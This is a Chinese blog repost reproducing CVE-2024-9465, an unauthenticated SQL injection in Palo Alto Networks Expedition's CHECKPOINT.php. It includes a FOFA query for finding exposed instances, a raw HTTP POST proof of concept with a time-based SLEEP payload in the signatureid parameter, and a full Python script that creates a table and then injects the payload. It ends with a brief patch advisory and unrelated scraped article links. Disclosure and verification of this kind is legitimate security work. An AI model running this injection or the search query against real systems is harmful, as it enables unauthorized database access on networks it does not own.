当前位置: 首页 > news >正文

Palo Alto Networks Expedition 未授权SQL注入漏洞复现(CVE-2024-9465)

0x01 产品介绍:

        Palo Alto Networks Expedition 是一款强大的工具,帮助用户有效地迁移和优化网络安全策略,提升安全管理的效率和效果。它的自动化功能、策略分析和可视化报告使其在网络安全领域中成为一个重要的解决方案。

0x02 漏洞描述:

        该漏洞由于CHECKPOINT.php文件存在未授权访问。在sql校验逻辑中存在action=import当解析控制参数时会创建变量routename和id并且以字符串格式构造查询。导致了漏洞的产生

0x03 影响版本:

Palo Alto Networks Expedition < 1.2.96

0x04 搜索语句:

Fofa:title="Expedition Project"

0x05 漏洞复现:

poc

POST /bin/configurations/parsers/Checkpoint/CHECKPOINT.php HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencodedaction=import&type=test&project=pandbRBAC&signatureid=1%20AND%20(SELECT%201234%20FROM%20(SELECT(SLEEP(5)))test)

 

检测脚本:

脚本作者:https://github.com/horizon3ai/CVE-2024-9465

#!/usr/bin/python3
import argparse
import requests
import urllib3
import sys
import time
urllib3.disable_warnings()def create_checkpoint_table(url: str):print(f'[*] Creating Checkpoint database table...')data = {'action': 'get','type': 'existing_ruleBases','project': 'pandbRBAC',}r = requests.post(f'{url}/bin/configurations/parsers/Checkpoint/CHECKPOINT.php', data=data, verify=False, timeout=30)if r.status_code == 200 and 'ruleBasesNames' in r.text:print(f'[*] Successfully created the database table')returnprint(f'[-] Unexpected response creating table: {r.status_code}:{r.text}')sys.exit(1)def inject_checkpoint_query(url: str):start_time = time.time()print(f'[*] Injecting 10 second sleep payload into database query...')data = {'action': 'import','type': 'test','project': 'pandbRBAC','signatureid': '1 AND (SELECT 1234 FROM (SELECT(SLEEP(10)))horizon3)',}r = requests.post(f'{url}/bin/configurations/parsers/Checkpoint/CHECKPOINT.php', data=data, verify=False, timeout=30)execution_time = time.time() - start_timeif r.status_code == 200 and execution_time > 9 and execution_time < 15:print(f'[*] Successfully sent injection payload!')print(f'[+] Target is vulnerable, request took {execution_time} seconds')returnprint(f'[-] Unexpected response sending injection payload: {r.status_code}:{r.text}')sys.exit(1)if __name__ == "__main__":parser = argparse.ArgumentParser()parser.add_argument('-u', '--url', help='The URL of the target', type=str, required=True)args = parser.parse_args()create_checkpoint_table(args.url)inject_checkpoint_query(args.url)

 

0x06 修复建议:

厂商已发布补丁 请即时升级

Expedition | Palo Alto Networks


http://www.mrgr.cn/news/50372.html

相关文章:

  • 网络资源模板--Android Studio 实现宿舍管理系统App
  • MYSQL数据库和oracle数据库的详细对比,该怎么选择?
  • ICM20948 DMP代码详解(81)
  • pandas中数据子集的获取
  • 惊人秘诀!揭秘ChatGPT写作的最佳提问技巧!帮你拿到满分论文
  • 华宇携司法大模型亮相2024中国移动全球合作伙伴大会
  • 解锁救援秘诀:为什么救生抛投器你用不明白?
  • 探索全流量回溯分析系统:IT运维的必备利器
  • 【RabbitMQ】RabbitMQ 7种工作模式简单使用示例
  • C#归并排序算法(动态图解)
  • 恢复已删除文件的 10 种安卓数据恢复工具
  • Nuxt3部署-Ubuntu系统(Node 服务 + pm2 + Nginx 反向代理)
  • 第J5周:DenseNet+SE-Net实战(TensorFlow版)
  • 基于Python的自然语言处理系列(33):Huggingface基础与Pipeline
  • Piktures 2.17 | 高效相册管理工具
  • 如何用智能码二维码zhinengma.cn做设备标牌
  • OCP在Python中的应用
  • Linux应用框架cpp-tbox之TCP通信(下篇)
  • 【Python爬虫系列】_028.Python玩Redis
  • 源码编译llama.cpp for windows on arm